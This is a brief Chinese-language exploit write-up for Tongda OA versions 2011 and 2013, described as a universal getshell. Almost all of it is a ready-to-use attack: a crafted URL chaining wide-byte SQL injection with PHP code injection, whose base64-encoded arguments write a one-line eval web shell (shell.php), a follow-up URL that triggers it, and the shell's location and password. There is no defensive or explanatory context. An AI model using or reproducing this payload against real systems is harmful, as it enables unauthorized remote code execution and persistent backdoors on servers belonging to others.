通达oa 2011 2013 通杀GETSHELL
通达oa 2011-2013 通杀GETSHELL¶
漏洞影响¶
2011、2013版本
复现过程¶
第一步:
http://url/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
第二步:
http://url/general/email/index.php
SHELL:
http://url/general/email/shell.php 密码C